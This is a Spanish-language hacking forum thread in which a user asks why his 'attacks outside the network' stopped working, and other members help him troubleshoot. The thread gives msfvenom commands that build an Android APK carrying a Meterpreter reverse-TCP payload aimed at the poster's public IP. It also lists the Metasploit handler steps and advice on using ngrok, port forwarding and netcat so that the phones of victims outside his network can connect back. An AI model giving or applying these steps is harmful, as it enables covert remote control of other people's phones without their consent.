elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Problema, ataques fuera de red.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema, ataques fuera de red.  (Leído 378 veces)
N0I$E

Desconectado Desconectado

Mensajes: 9


kernel panic


Ver Perfil WWW
Problema, ataques fuera de red.
« en: 6 Marzo 2020, 04:21 »

Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad.

El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera.

msfvenom -p android/meterpreter/reverse_tcp  lhost=<mi ip publica>  lport=4444 R>/root/Escritorio/aplicacion.apk

Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma.

1) use exploit/multi/hander
2) set payload android/meterpreter/reverse_tcp
3) set lport=<mi ip local> y también set lport=444
5) exploit

Aún configurando la aplicación de esa manera sigue sin funcionar  :-\
¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo?

¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local.


Gracias.
En línea

Depredador

Desconectado Desconectado

Mensajes: 150


¡No muerdo! Cataluña/Garrotxa


Ver Perfil
Re: Problema, ataques fuera de red.
« Respuesta #1 en: 6 Marzo 2020, 09:51 »

Haber pero si lo haces fuera de la red local lo lógico es usar algo como ngrok. Ya que por lo que entiendo tu le estas diciendo al exploit que al ser ejecutado se conecte a una ip de una red la cual la persona que quieres atacar no esta en esa red.   :rolleyes:
Haber ngrok haces público tu local host.
No se si me equivoco, ya que no estoy muy informado en este tema,...
Salu2!
« Última modificación: 6 Marzo 2020, 09:59 por Depredador » En línea

N0I$E

Desconectado Desconectado

Mensajes: 9


kernel panic


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #2 en: 9 Marzo 2020, 23:50 »

No es una solución en si, ya que antes podía realizar ese tipo de tareas sin necesidad de otras aplicaciones, simplemente metasploit y no-ip, pero con el problema que se me ha presentado ngrok me ha sido muy útil, gracias por la información.  ::)
En línea

@XSStringManolo
Colaborador
***
Desconectado Desconectado

Mensajes: 1.968


Turn off the red ligth


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #3 en: 10 Marzo 2020, 01:21 »

Tienes los puertos del router abiertos?

Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444.
Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.

Por comodidad puedes usar print working directory en lugar de poner la ruta manual.

msfvenom -p android/meterpreter/reverse_tcp  lhost=<mi ip publica>  lport=4444 R > pwd

Cuando sea así prueba con el netcat a la escucha en el puerto 4444.

A mi me van horribles las .apk generadas con msfvenom.
En línea

N0I$E

Desconectado Desconectado

Mensajes: 9


kernel panic


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #4 en: 10 Marzo 2020, 07:41 »

Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta.

La única herramienta que instalé en ese entonces fue NO-IP.

Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes  ;-)




Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444.
Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.

« Última modificación: 10 Marzo 2020, 07:49 por N0I$E » En línea

@XSStringManolo
Colaborador
***
Desconectado Desconectado

Mensajes: 1.968


Turn off the red ligth


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #5 en: 10 Marzo 2020, 18:24 »

Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta.

La única herramienta que instalé en ese entonces fue NO-IP.

Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes  ;-)



Comprueba con netcat si te funciona correctamente la apertura y cierre de puertos.
Si no te funciona llama a tu ISP y dile que abriste los puertos y no te llegan los paquetes, que te habiliten abrir y cerrar puertos cuando consideres, si no te cambias de compañía.

Si pones tu equipo como DMZ lo expones a internet y si no tienes un firewall de internet a tu DMZ y otro firewall que evite conexiones de tu DMZ a tu red local estás totalmente expuesto.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines